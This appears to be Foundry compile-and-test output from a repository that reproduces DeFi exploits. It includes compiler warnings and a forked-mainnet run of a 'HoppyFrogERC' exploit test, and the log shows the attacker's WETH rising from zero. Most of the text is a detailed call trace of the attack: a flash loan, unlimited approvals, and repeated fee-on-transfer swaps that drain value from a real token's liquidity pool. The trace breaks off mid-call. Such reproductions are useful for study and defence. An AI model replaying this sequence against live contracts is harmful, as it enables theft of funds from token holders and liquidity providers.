Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.38s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-04/HoppyFrogERC_exp.sol:16:5:
   |
16 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/HoppyFrogERC_exp.sol:30:37:
   |
30 |     function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                     ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/HoppyFrogERC_exp.sol:30:54:
   |
30 |     function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                      ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-04/HoppyFrogERC_exp.sol:30:71:
   |
30 |     function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                                       ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.71s (4.05ms CPU time)

Ran 1 test for src/test/2024-04/HoppyFrogERC_exp.sol:Exploit
[PASS] testExploit() (gas: 432114)
Logs:
  [Begin] Attacker WETH before exploit: 0.000000000000000000
  [End] Attacker WETH after exploit: 0.378824808020857200

Traces:
  [5830] Exploit::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19570744 [1.957e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [545408] Exploit::testExploit()
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker WETH before exploit", val: 0, decimals: 18)
    ├─ [2661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0xaA6f337f16E6658d9c9599c967D3126051b6c726) [staticcall]
    │   └─ ← [Return] 7485235167653113869853 [7.485e21]
    ├─ [516423] 0xaA6f337f16E6658d9c9599c967D3126051b6c726::flash(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 7485235167653113869853 [7.485e21], 0x313233)
    │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xaA6f337f16E6658d9c9599c967D3126051b6c726) [staticcall]
    │   │   └─ ← [Return] 2033386879915592850 [2.033e18]
    │   ├─ [661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0xaA6f337f16E6658d9c9599c967D3126051b6c726) [staticcall]
    │   │   └─ ← [Return] 7485235167653113869853 [7.485e21]
    │   ├─ [45248] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7485235167653113869853 [7.485e21])
    │   │   ├─ emit Transfer(from: 0xaA6f337f16E6658d9c9599c967D3126051b6c726, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 7485235167653113869853 [7.485e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000195c6815e814157b61d
    │   │   │   @ 0xa956d0613891519c13a3326694b8eee311998029c3155840f12440ed005e9b1d: 0x000000000000000000000000000000000000000000000195c6815e814157b61d → 0
    │   │   └─ ← [Return] true
    │   ├─ [444556] Exploit::uniswapV3FlashCallback(0, 74852351676531138699 [7.485e19], 0x313233)
    │   │   ├─ [24633] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2633] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 3071435167652113869853 [3.071e21])
    │   │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 3071435167652113869853 [3.071e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0x0000000000000000000000000000000000000000000000a680b9bbd19298ec1d
    │   │   │   └─ ← [Return] true
    │   │   ├─ [97602] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokensSupportingFeeOnTransferTokens(3071435167652113869853 [3.071e21], 0, [0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1712092859 [1.712e9])
    │   │   │   ├─ [23197] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::transferFrom(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, 3071435167652113869853 [3.071e21])
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, value: 3071435167652113869853 [3.071e21])
    │   │   │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0x0000000000000000000000000000000000000000000000a680b9bbd19298ec1d → 0
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000195c6815e814157b61d → 0x0000000000000000000000000000000000000000000000ef45c7a2afaebeca00
    │   │   │   │   │   @ 0xfe3385f329839403389db46b4ce3376c324c5ebe79f7c42b19a7b5f2778c439c: 0x000000000000000000000000000000000000000000000523f249a8b896e3576a → 0x0000000000000000000000000000000000000000000005ca7303648a297c4387
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2504] 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 19309972092437652155 [1.93e19], 24274927127869297743722 [2.427e22], 1712092679 [1.712e9]
    │   │   │   ├─ [661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   └─ ← [Return] 27346362295521411613575 [2.734e22]
    │   │   │   ├─ [60480] 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759::swap(2163042004622102462 [2.163e18], 0, Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [27962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2163042004622102462 [2.163e18])
    │   │   │   │   │   ├─ emit Transfer(from: 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2163042004622102462 [2.163e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xe100440dfc2dbe147e3cf35e4fa6edfac3a7aa3ac0ab3526fe551ded77e37432: 0x0000000000000000000000000000000000000000000000010bfacd4f3873e2bb → 0x000000000000000000000000000000000000000000000000edf6221108b412fd
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000001e04ab3e2fbfcfbe
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   │   └─ ← [Return] 17146930087815549693 [1.714e19]
    │   │   │   │   ├─ [661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   │   └─ ← [Return] 27346362295521411613575 [2.734e22]
    │   │   │   │   ├─ emit Sync(reserve0: 17146930087815549693 [1.714e19], reserve1: 27346362295521411613575 [2.734e22])
    │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 3071435167652113869853 [3.071e21], amount0Out: 2163042004622102462 [2.163e18], amount1Out: 0, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x000000000000000000000000000005f72fc344f2e1ee97c7b950d8234cf32eac → 0x000000000000000000000000000005faa3aca2eab19cc58c5d32b39c4aa05714
    │   │   │   │   │   @ 10: 0x00000000000000000000000000000000000f011efb8a942f46fc11e6d5b341d8 → 0x00000000000000000000000000000000000f25c6b9fb6e10f1c0a5c77cf1db54
    │   │   │   │   │   @ 8: 0x660c7607000000000523f249a8b896e3576a0000000000010bfacd4f3873e2bb → 0x660c76bb0000000005ca7303648a297c4387000000000000edf6221108b412fd
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 2163042004622102462 [2.163e18]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [11348] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::transfer(0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, 206900000001000000000 [2.069e20])
    │   │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, value: 206900000001000000000 [2.069e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000ef45c7a2afaebeca00 → 0x0000000000000000000000000000000000000000000000e40e772ce376d20000
    │   │   │   │   @ 0x91af4d40cd4ad418c448c3718356e1e15e88a9c9d7db3e892e03c647c04bb124: 0x0000000000000000000000000000000000000000000000d8d726b7177a800000 → 0x0000000000000000000000000000000000000000000000e40e772ce3b26cca00
    │   │   │   └─ ← [Return] true
    │   │   ├─ [22533] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 4206900000000000000000 [4.206e21])
    │   │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 4206900000000000000000 [4.206e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0 → 0x0000000000000000000000000000000000000000000000e40e772ce376d20000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [167287] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokensSupportingFeeOnTransferTokens(4206900000000000000000 [4.206e21], 0, [0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1712092859 [1.712e9])
    │   │   │   ├─ [141298] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::transferFrom(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, 4206900000000000000000 [4.206e21])
    │   │   │   │   ├─ [275] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::WETH() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2
    │   │   │   │   ├─ emit Approval(owner: 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 4206900000000000000000 [4.206e21])
    │   │   │   │   ├─ [72843] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForETHSupportingFeeOnTransferTokens(4206900000000000000000 [4.206e21], 0, [0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, 1712092859 [1.712e9])
    │   │   │   │   │   ├─ [9215] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::transferFrom(0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, 4206900000000000000000 [4.206e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, to: 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, value: 4206900000000000000000 [4.206e21])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F, spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 0)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xfe3385f329839403389db46b4ce3376c324c5ebe79f7c42b19a7b5f2778c439c: 0x0000000000000000000000000000000000000000000005ca7303648a297c4387 → 0x0000000000000000000000000000000000000000000006ae817a916da04e4387
    │   │   │   │   │   │   │   @ 0x91af4d40cd4ad418c448c3718356e1e15e88a9c9d7db3e892e03c647c04bb124: 0x0000000000000000000000000000000000000000000000e40e772ce3b26cca00 → 0x000000000000000000000000000000000000000000000000000000003b9aca00
    │   │   │   │   │   │   │   @ 0xd2052a1b1ebe56bd3a17c6ffe300879ea7cbb260c600dac1d4fd49e47aef769d: 0x0000000000000000000000000000000000000000000000e40e772ce376d20000 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [504] 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 17146930087815549693 [1.714e19], 27346362295521411613575 [2.734e22], 1712092859 [1.712e9]
    │   │   │   │   │   ├─ [661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 31553262295521411613575 [3.155e22]
    │   │   │   │   │   ├─ [38464] 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759::swap(2280201362044709503 [2.28e18], 0, 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 0x)
    │   │   │   │   │   │   ├─ [25162] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 2280201362044709503 [2.28e18])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 2280201362044709503 [2.28e18])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x0000000000000000000000000000000000000000000000001fa4e70ec9096a7f
    │   │   │   │   │   │   │   │   @ 0xe100440dfc2dbe147e3cf35e4fa6edfac3a7aa3ac0ab3526fe551ded77e37432: 0x000000000000000000000000000000000000000000000000edf6221108b412fd → 0x000000000000000000000000000000000000000000000000ce513b023faaa87e
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 14866728725770840190 [1.486e19]
    │   │   │   │   │   │   ├─ [661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 31553262295521411613575 [3.155e22]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 14866728725770840190 [1.486e19], reserve1: 31553262295521411613575 [3.155e22])
    │   │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 4206900000000000000000 [4.206e21], amount0Out: 2280201362044709503 [2.28e18], amount1Out: 0, to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x660c76bb0000000005ca7303648a297c4387000000000000edf6221108b412fd → 0x660c76bb0000000006ae817a916da04e4387000000000000ce513b023faaa87e
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2280201362044709503 [2.28e18]
    │   │   │   │   │   ├─ [9223] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(2280201362044709503 [2.28e18])
    │   │   │   │   │   │   ├─ [83] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::fallback{value: 2280201362044709503}()
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ emit Withdrawal(src: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 2280201362044709503 [2.28e18])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x0000000000000000000000000000000000000000000000001fa4e70ec9096a7f → 0
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [55] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::fallback{value: 2280201362044709503}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [0] 0x8B75ce8e330bA0EE5fB3a2B47b9e9b4260C08438::fallback{value: 2280201362044709503}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, value: 4206900000000000000000 [4.206e21])
    │   │   │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 22: 0x00000000000000000000000000000000000000000000000000000000012a96a4 → 0x00000000000000000000000000000000000000000000000000000000012aa038
    │   │   │   │   │   @ 0xd2052a1b1ebe56bd3a17c6ffe300879ea7cbb260c600dac1d4fd49e47aef769d: 0 → 0x0000000000000000000000000000000000000000000000e40e772ce376d20000
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000e40e772ce376d20000 → 0
    │   │   │   │   │   @ 0xfe3385f329839403389db46b4ce3376c324c5ebe79f7c42b19a7b5f2778c439c: 0x0000000000000000000000000000000000000000000006ae817a916da04e4387 → 0x0000000000000000000000000000000000000000000007928ff1be5117204387
    │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0x0000000000000000000000000000000000000000000000e40e772ce376d20000 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 2163042004622102462 [2.163e18]
    │   │   │   ├─ [504] 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 14866728725770840190 [1.486e19], 31553262295521411613575 [3.155e22], 1712092859 [1.712e9]
    │   │   │   ├─ [661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   └─ ← [Return] 35760162295521411613575 [3.576e22]
    │   │   │   ├─ [16564] 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759::swap(1744321700741180771 [1.744e18], 0, Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1744321700741180771 [1.744e18])
    │   │   │   │   │   ├─ emit Transfer(from: 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1744321700741180771 [1.744e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xe100440dfc2dbe147e3cf35e4fa6edfac3a7aa3ac0ab3526fe551ded77e37432: 0x000000000000000000000000000000000000000000000000ce513b023faaa87e → 0x000000000000000000000000000000000000000000000000b61c27a9ecfbbb1b
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000001e04ab3e2fbfcfbe → 0x0000000000000000000000000000000000000000000000003639be96826ebd21
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   │   └─ ← [Return] 13122407025029659419 [1.312e19]
    │   │   │   │   ├─ [661] 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F::balanceOf(0x53EeF67F96ccb71fB1750Df973fB9e8C82096759) [staticcall]
    │   │   │   │   │   └─ ← [Return] 35760162295521411613575 [3.576e22]
    │   │   │   │   ├─ emit Sync(reserve0: 13122407025029659419 [1.312e19], reserve1: 35760162295521411613575 [3.576e22])
    │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 4206900000000000000000 [4.206e21], amount0Out: 1744321700741180771 [1.744e18], amount1Out: 0, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x660c76bb0000000006ae817a916da04e4387000000000000ce513b023faaa87e → 0x660c76bb0000000007928ff1be5117204387000000000000b61c27a9ecfbbb1b
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 3907363705363283233 [3.907e18]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 3907363705363283233 [3.907e18])
    │   │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 3907363705363283233 [3.907e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0x0000000000000000000000000000000000000000000000003639be96826ebd21
    │   │   │   └─ ← [Return] true
    │   │   ├─ [66921] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapTokensForExactTokens(7560087519329645008552 [7.56e21], 3907363705363283233 [3.907e18], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0xE5c6F5fEF89B64f36BfcCb063962820136bAc42F], Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1712092979 [1.712e9])
    │   │   │   ├─ [504] 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 13122407025029659419 [1.312e19], 35760162295521411613575 [3.576e22], 1712092859 [1.712e9]
    │   │   │   ├─ [4148] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, 3528538897342426033 [3.528e18])
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x53EeF67F96ccb71fB1750Df973fB9e8C82096759, value: 3528538897342426033 [3.528e18])
